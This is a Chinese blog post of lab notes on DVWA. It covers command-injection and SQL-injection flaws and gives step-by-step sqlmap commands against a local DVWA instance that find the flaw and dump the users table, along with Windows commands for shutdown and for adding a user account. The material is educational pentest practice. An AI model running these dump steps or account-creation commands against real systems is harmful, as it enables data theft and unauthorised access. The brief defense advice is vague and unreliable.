sql注入漏洞

最新推荐文章于 2024-08-22 22:47:51 发布
最新推荐文章于 2024-08-22 22:47:51 发布
阅读量39 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73592765/article/details/132067408
版权

DVWA靶场搭建。

下载PHP环境   (WAMP)

DVWA源代码:https://github.com/digininja/DVWA/archive/master.zip

①命令执行漏洞

原因:应用系统从设计上需要给用户提供指定的远程命令操作的接口,用户从web界面输入目标ip,提交后后台会对ip地址进行一次ping测试并返回测试结果,而如果设计者在完成该功能时,没有严格的安全控制,则可能会导致攻击者通过该接口提交恶意命令,让后台进行执行,从而获得后台服务器权限。

渗透测试解决方法:

白盒测试:可以看到源代码,查看源代码过滤机制

黑盒测试:看不到源代码,依次尝试常见命令连接符

②SQL注入漏洞

原因:发生于应用程序与数据库层的安全漏洞。在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符串检查,这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL

过程:

第一步:检测漏洞

python sqlmap.py -u "地址名" --cookie=""(python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3lqptfa7v1ldbd24mhjgi806du"  )

第二步:获取数据库名

python sqlmap.py -u "地址名" --cookie="" --dbs(获取所有数据库名)

第三步:获取指定数据库表

python sqlmap.py -u "地址名" --cookie=""  -D dvwa --tables(python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3lqptfa7v1ldbd24mhjgi806du" -D dvwa --tables)

-D:Database指定想要获取的数据库名为dvwa

-T:Table指定想要获取的表名为users

--columns:列出表项/列

第四步:获取指定数据库列/表项

python sqlmap.py -u "地址名" --cookie="" -D dvwa -T users --columns

第五步:获取数据

python sqlmap.py -u "地址名" --cookie="" -D dvwa -T users --dump

--dump:读取数据

sql injection 防御(medium)

解决方法:①转义为16进制数(在网页hex上进行)

②调用database()方法

常用cmd命令:

whoami 查看当前用户名

ipconfig 查看网卡信息

shutdown -s -t 0 立即关机

net user [username] [password]  /add  增加一个用户名username为密码为password的新用户

type [file_name] 查看filename文件内容

晚风吹行舟254
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入是网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
【达梦数据库】-导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 303
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
分布式事务:基本概念
玉汝于成
08-20 265
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
linux安装达梦数据库
HAN_789的博客
08-19 216
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 541
【代码】springboot网上商品订单转手系统bootpf
Android架构组件:MVVM模式的实战应用
m0_66995023的博客
08-22 195
在 Android 开发中,MVVM(Model-View-ViewModel)模式是一种非常流行的架构模式,它可以帮助开发者更好地组织代码,使得应用程序更加模块化、易于维护。用途:在 ViewModel 中使用,当数据发生变化时通知 View 更新。职责:作为 Model 和 View 之间的桥梁,处理 UI 相关的逻辑。实例:持有数据和 UI 相关的状态,处理用户输入,更新 UI 等。用途:实现 View 和 ViewModel 之间的双向绑定。特点:简化 UI 更新逻辑,减少手动更新 UI 的代码。
笔记redis
风止的博客
08-22 568
Redis(Remote Dictionary Server)是用C语言开发的一个基于的数据库
ABAP 程序间传递数据
weixin_45879627的博客
08-21 779
ABAP 程序间传递数据
MySQL索引的性能优化
2302_79993788的博客
08-15 1263
数据库调优中,我们的目标就是响应时间更快,吞吐量更大。利用宏观的监控工具和微观的日志分析可以帮我们快速找到调优的思路和方式。
谷粒商城实战笔记-236~238-商城业务-购物车-环境搭建
epitomizelu的专栏
08-22 584
这一节的内容主要分析购物的业务逻辑和设计存储购物车的选型及数据结构。①把整个购物车封装为一个对象CartVo。
【mysql】大规模企业常用的MySQL性能优化方案分享
景天科技苑
08-21 751
MySQL作为广泛使用的关系型数据库管理系统,其性能优化对于提升应用程序的响应速度、保障系统稳定运行以及提高用户体验至关重要。本文将结合实际案例,详细阐述MySQL性能优化的多种策略和方法,涵盖查询优化、索引优化、表结构优化、服务器配置调整、定期维护、缓存技术、数据分区与分表、负载均衡技术、数据库设计优化以及性能监控与调优等多个方面。
Linux软件编程---数据库
最新发布
m0_65301172的博客
08-22 474
数据库中最难的操作还是,查询操作,查询按照很多不同条件查询,情况比较多,必须扎实掌握。
SAP Memory & ABAP Memory超级详细解析
qq_53645728的博客
08-18 1088
该语句将使用 EXPORT 语句写入数据库表 dbtab 的数据集群的所有数据对象的内容表传递给内部表 itab,数据库表 dbtab 的 ID 位于 id 中指定的区域 ar 中。它们还定义了适当的转换规则。规则扩展的目的是,在结构类型相同的情况下,如果最高级别的源结构比数据簇中的目标结构有更多的组件,则多余的组件将被删除。允许使用以下值: F “表示基本的平面数据对象,”G “表示字符串,”R “表示平面结构,”S “表示深层结构,”T “表示具有平面行类型的内部表,”C "表示具有深层行类型的表。
06--kubernetes.pod管理与投射数据卷
qq_43387908的博客
08-22 1313
整理一下k8s资源对象的配置和管理命令卷映射的使用方法。
探究短信里的短链接是如何实现的
热爱技术,享受生活
08-21 231
我们日常在收短信的时候,会经常发现,他们的短信里的跳转链接,都是非常短非常短的,这是为什么呢?因为现在短信新规出来,是按字数收费的,而不是按条。比如腾讯云短信新规,70字为一条,哪怕你是一条短信,100个字,就会按照两条来计费,这个时候短链接就有了相当大的优势。那么短链接是如何实现的呢?
SQL注入漏洞详解与实战教程
本资源是一份关于Web渗透测试入门的教程,重点讲解了SQL注入漏洞的相关知识。SQL注入漏洞是Web安全领域的一个严重威胁,它发生在黑客通过恶意构造SQL语句,利用应用程序处理用户输入时的不当过滤或转义,获取、修改...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值